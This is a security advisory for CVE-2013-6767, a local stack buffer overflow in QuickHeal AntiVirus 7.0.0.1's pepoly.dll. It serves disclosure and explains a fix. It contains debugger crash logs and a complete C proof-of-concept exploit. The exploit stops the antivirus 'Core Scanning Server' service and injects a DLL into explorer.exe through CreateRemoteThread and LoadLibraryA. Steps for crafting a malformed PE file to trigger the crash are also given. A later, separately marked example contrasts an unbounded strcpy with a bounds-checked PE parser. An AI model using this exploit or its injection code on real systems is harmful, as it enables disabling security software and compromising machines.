QuickHeal AntiVirus 7.0.0.1 Stack Overflow Vulnerability

2013.12.17
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Document Title:
===============
QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1171
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6767

CVE-ID:
=======
CVE-2013-6767

Release Date:
=============
2013-12-16

Vulnerability Laboratory ID (VL-ID):
====================================
1171

Common Vulnerability Scoring System:
====================================
5.6

Product & Service Introduction:
===============================
The simple interface and best virus protection technology of Quick Heal AntiVirus Pro ensures complete security without interrupting or slowing down your system. Real time cloud security restricts access to malware infected websites. Spam filters stop phishing and infected emails from reaching your inbox. Uninterrupted PC usage and viewing without prompts.

Quick Heal Anti-Virus is an all-round antivirus and security tool aimed at the intermediate home user. On first appearances, Quick Heal Anti-Virus doesn't do well. Installation is complicated, and the initial window that shows up is not, in fact, the main interface. Once you find your way back to the control center, however, things become much clearer. Visually, Quick Heal Anti-Virus is fairly successful. It has a nice, if not revolutionary, interface and all the sections are easy to navigate. It also has a good selection of configuration options, where you can customize everything from what behavior the program takes when it finds a virus to setting a password so nobody can change your configurations.

(Copy of the Homepage: http://www.quickheal.com/download-free-antivirus )

Abstract Advisory Information:
==============================
An independent laboratory researcher discovered a local stack buffer overflow vulnerability in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.
Vulnerability Disclosure Timeline:
==================================
2013-12-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Quick Heal Technologies (P) Ltd
Product: QuickHeal AntiVirus - Software 7.0.0.1 (build 2.0.0.1 - 2.0.0.0)

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software. The vulnerability allows local low privileged user accounts to compromise the system through a classic stack overflow issue.

QuickHeal Antivirus suffers from improper handling of buffers in its `pepoly.dll` module under certain conditions, which leads to a stack overflow. Once the `Core Scanning Server` service has been disabled, the vulnerable code path can be triggered and the system crashed. Run the PoC and, once the properties dialog appears, change the tab from `General` to `QuickHeal`. This causes QuickHeal to scan the file and report its status back to you (whether it is infected or clean). Notably, under normal conditions I was unable to trigger the vulnerability, which is why I inject a DLL into `explorer.exe` to trigger the bug in the right manner.

The vulnerability is located in the generated PE file's `*.text` value. Local attackers are able to overflow the process through a manipulated import of a malicious PE file. The issue is a classic (unicode) stack buffer overflow. Local attackers can overwrite the registers to compromise the system or crash the QuickHeal software process. The security risk of the local stack buffer overflow vulnerability is estimated as medium(+) with a CVSS (Common Vulnerability Scoring System) count of 5.6(+)|(-)5.7.
The vulnerability can be exploited by local attackers with a low privileged system user account and without user interaction. Successful exploitation of the local stack buffer overflow software vulnerability results in process and system compromise.

Proof of Concept (PoC):
=======================
The local stack buffer overflow vulnerability can be exploited by local attackers with a low privileged system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

--- PoC Debug Logs ---
eax=000015bc ebx=03f48a0c ecx=03f12a34 edx=03f47a68 esi=089c84e8 edi=00000000
eip=05bab107 esp=03f47a2c ebp=000822d8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
*** WARNING: Unable to verify checksum for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll -
pepoly!GetRealTypeByContents+0x297147:
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
05bab107 8501 test dword ptr [ecx],eax ds:0023:03f12a34=00000000
0:019> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
03f47a2c 05b73afa 059342ac 00000000 000822d8 pepoly!GetRealTypeByContents+0x297147
03f47ab0 41414141 41414141 41414141 41414141 pepoly!GetRealTypeByContents+0x25fb3a
03f47ab4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ab8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47abc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ac8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47acc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ad0 41414141 41414141 41414141 30280000 <Unloaded_Res.dll>+0x41414110
03f47ad4 41414141 41414141 30280000 41414141 <Unloaded_Res.dll>+0x41414110
03f47ad8 41414141 30280000 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47adc 30280000 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ae0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x3027ffcf
03f47ae4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47ae8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47aec 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
03f47af8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110
--- PoC Debug Logs ---

--- PoC Exploit (*.c) ---
/*
Title   : QuickHeal Antivirus Pro (Pepoly.dll) Stack Overflow Vulnerability
Version : 7.0.0.1 (2014) - ( latest & other versions might also be affected )
Author  : Arash Allebrahim
Contact : Genius_s3c_firewall($$$)yahoo($$$)com
Vendor  : http://www.quickheal.com
Tested  : Win 7 sp 1 x86 Ultimate & Win XP SP3 ENG
Note    : vuln.exe should be at c:\vuln.exe => vuln.exe is just a Corrupted PE File aims at crashing & nothing more
*/
#define WIN32_LEAN_AND_MEAN
#define _WIN32_WINNT 0x0501   /* SERVICE_STATUS_PROCESS is declared in winsvc.h from this level on */
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <conio.h>
#include <stdio.h>
#include <string.h>
#include <tchar.h>
#include <aclapi.h>

/* Minimal access mask needed for the injection step (allocate, write, start a thread). */
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | \
                              PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)

#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "shlwapi.lib")   /* StrStrI */

VOID  __stdcall DoStopSvc(void);
BOOL  Inject(DWORD pID, const char *DLL_NAME);
DWORD GetTargetThreadIDFromProcName(const char *ProcName);

SC_HANDLE schSCManager;
SC_HANDLE schService;

int main(int argc, char *argv[])
{
    char buf[MAX_PATH] = {0};
    DWORD pID = GetTargetThreadIDFromProcName("explorer.exe");

    printf("\n\n");
    printf("\n\nQuickHeal Antivirus (7.0.0.1) pepoly.dll stack overflow vulnerability Proof of Concept Code");
    printf("\n\nAuthor : Arash Allebrahim");

    /* Absolute path of the helper DLL that sits next to the PoC executable. */
    GetFullPathName("ShellExecuteExProperties.dll", MAX_PATH, buf, NULL);
    printf("\n");

    DoStopSvc();

    if (!Inject(pID, buf)) {
        printf("\n\nDLL Not Loaded!");
    } else {
        printf("\n\nDLL Loaded!");
        printf("\n\n( + ) It's ok! just click on QuickHeal tab!");
    }
    _getch();
    return 0;
}

/* Stops the "Core Scanning Server" service. Opening the SCM with
 * SC_MANAGER_ALL_ACCESS and stopping a service normally requires
 * administrative rights, so this step fails for an unprivileged user. */
VOID __stdcall DoStopSvc(void)
{
    SERVICE_STATUS_PROCESS ssp;

    schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (NULL == schSCManager) {
        printf("OpenSCManager failed (%lu)\n", GetLastError());
        return;
    }
    schService = OpenService(schSCManager, "Core Scanning Server",
                             SERVICE_STOP | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS);
    if (schService == NULL) {
        printf("OpenService failed (%lu)\n", GetLastError());
        CloseServiceHandle(schSCManager);
        return;
    }
    if (!ControlService(schService, SERVICE_CONTROL_STOP, (LPSERVICE_STATUS)&ssp)) {
        printf("ControlService failed (%lu)\n", GetLastError());
    }
    CloseServiceHandle(schService);
    CloseServiceHandle(schSCManager);
}

/* Classic LoadLibraryA injection: write the DLL path into the target process
 * and start a remote thread on LoadLibraryA with that path as its argument. */
BOOL Inject(DWORD pID, const char *DLL_NAME)
{
    HANDLE Proc, hThread;
    LPVOID RemoteString, LoadLibAddy;
    SIZE_T len = strlen(DLL_NAME) + 1;   /* include the terminating NUL */

    if (!pID) return FALSE;

    Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, pID);
    if (!Proc) {
        printf("OpenProcess() failed: %lu", GetLastError());
        return FALSE;
    }
    LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    RemoteString = VirtualAllocEx(Proc, NULL, len, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!LoadLibAddy || !RemoteString) {
        CloseHandle(Proc);
        return FALSE;
    }
    WriteProcessMemory(Proc, RemoteString, DLL_NAME, len, NULL);
    hThread = CreateRemoteThread(Proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibAddy, RemoteString, 0, NULL);
    if (hThread) CloseHandle(hThread);
    CloseHandle(Proc);
    return hThread != NULL;
}

/* Returns the PID of the first process whose image name contains ProcName, or 0. */
DWORD GetTargetThreadIDFromProcName(const char *ProcName)
{
    PROCESSENTRY32 pe;
    HANDLE thSnapShot;
    BOOL retval;
    DWORD pid = 0;

    thSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (thSnapShot == INVALID_HANDLE_VALUE) {
        printf("Error: Unable to create toolhelp snapshot!");
        return 0;
    }
    pe.dwSize = sizeof(PROCESSENTRY32);
    retval = Process32First(thSnapShot, &pe);
    while (retval) {
        if (StrStrI(pe.szExeFile, ProcName)) {
            pid = pe.th32ProcessID;
            break;
        }
        retval = Process32Next(thSnapShot, &pe);
    }
    CloseHandle(thSnapShot);   /* the snapshot handle must be released */
    return pid;
}

PoC: PE File
To manipulate a PE test file you need to generate your own. In the second step, replace the content of the `*.text` (*) value after the PE[NULL] flag with a large unicode string of your own.

Standard files: StdAfx.h, StdAfx.cpp
These files are used to build a precompiled header (PCH) file named ShellExecuteExProperties.pch and a precompiled types file named StdAfx.obj.

Other notes:
AppWizard uses "TODO:" to indicate parts of the source code you should add to or customize.

Resource(s):
../ShellExecuteExProperties/ShellExecuteExProperties.cpp
../ShellExecuteExProperties/ShellExecuteExProperties.dsw
../ShellExecuteExProperties/ShellExecuteExProperties.opt
../ShellExecuteExProperties/ShellExecuteExProperties.ncb
../ShellExecuteExProperties/ShellExecuteExProperties.plg
../ShellExecuteExProperties/ShellExecuteExProperties.dsp
../ShellExecuteExProperties/StdAfx.cpp
../ShellExecuteExProperties/StdAfx.h
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.dll
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.ilk
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.obj
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pch
../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pdb
../ShellExecuteExProperties/Debug/StdAfx.obj
../ShellExecuteExProperties/Debug/vc60.idb
../ShellExecuteExProperties/Debug/vc60.pdb
../QH-PoC.c
../QH-PoC.dsp
../QH-PoC.dsw
../QH-PoC.ncb
../QH-PoC.opt
../QH-PoC.plg

Solution - Fix & Patch:
=======================
The vulnerability can be patched with a secure filter and a size restriction on the PE file name text flag before its content is copied.

Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability is estimated as medium(+).
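The advisory does not show the code inside pepoly.dll, so the following is an added example, not the vendor's or the researcher's code: it models the flaw described above generically, as an unbounded copy of an attacker-sized PE string field into a fixed stack buffer, beside the bounds-checked parser that implements the size restriction the Solution section calls for. Offsets follow the standard PE/COFF layout; the status codes, the constructed sample image and the scenario driver are assumptions made for this example and exist nowhere in the original.

```c
/* Added example (not the advisory's or Quick Heal's code): a bounds-checked walk
 * over the section headers of an in-memory PE image, next to the unbounded copy
 * that turns an attacker-sized string field into a stack overflow. Offsets are
 * the standard PE/COFF ones; no <windows.h> is needed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PE_SIGNATURE 0x00004550u   /* "PE\0\0" */
#define NAME_LEN     8             /* section Name: 8 raw bytes, NUL not required */
#define NAME_BUF     (NAME_LEN + 1)
#define SECHDR_SIZE  40
#define MAX_SECTIONS 96            /* hard limit in the PE/COFF specification */

enum pe_status { PE_OK = 0, PE_BAD_MAGIC, PE_TRUNCATED, PE_TOO_MANY_SECTIONS, PE_BAD_NAME };

/* Vulnerable pattern: strcpy() assumes a NUL terminator the format does not
 * guarantee, so a Name using all 8 bytes overruns `name`. Contrast only. */
void copy_name_unbounded(char name[NAME_BUF], const uint8_t *hdr)
{
    strcpy(name, (const char *)hdr);
}

/* Hardened: bounded length, guaranteed terminator, printable ASCII only. */
static enum pe_status copy_name_bounded(char name[NAME_BUF], const uint8_t *hdr)
{
    size_t n = 0;
    for (; n < NAME_LEN && hdr[n] != 0; n++) {
        if (hdr[n] < 0x20 || hdr[n] > 0x7e) return PE_BAD_NAME;
        name[n] = (char)hdr[n];
    }
    name[n] = '\0';
    return PE_OK;
}

/* Locate the section table; every offset is checked against `len` before use. */
static enum pe_status pe_sections(const uint8_t *img, size_t len,
                                  const uint8_t **table, uint16_t *count)
{
    uint32_t e_lfanew, sig; uint16_t nsec, opt_size; size_t tbl;
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return PE_BAD_MAGIC;
    memcpy(&e_lfanew, img + 0x3c, 4);
    if (e_lfanew > len || len - e_lfanew < 24) return PE_TRUNCATED;  /* signature + COFF header */
    memcpy(&sig, img + e_lfanew, 4);
    if (sig != PE_SIGNATURE) return PE_BAD_MAGIC;
    memcpy(&nsec, img + e_lfanew + 6, 2);       /* COFF NumberOfSections */
    memcpy(&opt_size, img + e_lfanew + 20, 2);  /* COFF SizeOfOptionalHeader */
    if (nsec > MAX_SECTIONS) return PE_TOO_MANY_SECTIONS;
    tbl = (size_t)e_lfanew + 24 + opt_size;
    if (tbl > len || (len - tbl) / SECHDR_SIZE < nsec) return PE_TRUNCATED;
    *table = img + tbl; *count = nsec;
    return PE_OK;
}

/* Validate an image and copy each section name with the bounded routine. */
enum pe_status pe_validate(const uint8_t *img, size_t len,
                           char names[][NAME_BUF], uint16_t *nsections)
{
    const uint8_t *tbl; uint16_t n, i;
    enum pe_status st = pe_sections(img, len, &tbl, &n);
    if (st != PE_OK) return st;
    for (i = 0; i < n; i++)
        if ((st = copy_name_bounded(names[i], tbl + (size_t)i * SECHDR_SIZE)) != PE_OK) return st;
    *nsections = n;
    return PE_OK;
}

/* Constructed sample image (not a real binary): MZ stub, PE signature at 0x40,
 * COFF header with `nsec` sections, empty optional header, then the headers. */
size_t build_sample(uint8_t *out, size_t cap, const char *const *names, uint16_t nsec)
{
    size_t need = 0x58 + (size_t)nsec * SECHDR_SIZE, i;
    uint32_t e_lfanew = 0x40, sig = PE_SIGNATURE;
    if (need > cap) return 0;
    memset(out, 0, need);
    out[0] = 'M'; out[1] = 'Z';
    memcpy(out + 0x3c, &e_lfanew, 4);
    memcpy(out + 0x40, &sig, 4);
    memcpy(out + 0x46, &nsec, 2);
    for (i = 0; i < nsec; i++) {
        size_t l = strlen(names[i]);
        memcpy(out + 0x58 + i * SECHDR_SIZE, names[i], l > NAME_LEN ? NAME_LEN : l);
    }
    return need;
}

const char *const good_names[] = { ".text", ".rdata", "longname" };  /* last one fills all 8 bytes */
const char *const bad_names[]  = { ".text", "\x01!!" };              /* control byte in a name */

/* Scenario driver for main() and the tests: build, optionally forge the section
 * count or truncate the buffer, validate, and hand back the last name copied. */
enum pe_status run_scenario(const char *const *names, uint16_t nsec, int truncate,
                            uint16_t forged_count, uint16_t *out_n, char last[NAME_BUF])
{
    uint8_t img[1024]; char out[MAX_SECTIONS][NAME_BUF]; enum pe_status st;
    size_t len = build_sample(img, sizeof img, names, nsec);
    if (forged_count) memcpy(img + 0x46, &forged_count, 2);   /* lie in the COFF header */
    st = pe_validate(img, len - (truncate ? 1 : 0), out, out_n);
    if (st == PE_OK && last) memcpy(last, out[nsec - 1], NAME_BUF);
    return st;
}

int main(void)
{
    uint16_t n = 0; char last[NAME_BUF] = {0};
    int st = run_scenario(good_names, 3, 0, 0, &n, last);
    printf("well-formed: status %d, %u sections, last name \"%s\"\n", st, n, last);
    printf("truncated image: status %d\n", run_scenario(good_names, 3, 1, 0, &n, NULL));
    printf("forged 65535 sections: status %d\n", run_scenario(good_names, 3, 0, 0xFFFF, &n, NULL));
    printf("control byte in name: status %d\n", run_scenario(bad_names, 2, 0, 0, &n, NULL));
    return 0;
}
```

The design point is that every value read from the file (e_lfanew, NumberOfSections, SizeOfOptionalHeader, each Name) is treated as hostile: offsets are compared against the buffer length before being dereferenced, the section count is capped at the specification's limit, and the name copy is bounded by the field width rather than by a terminator the input may not contain.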
Credits & Authors:
==================
Independent Laboratory Researcher - Arash Allebrahim - (Genius_s3c_firewall($$$)yahoo($$$)com)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

Copyright 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com

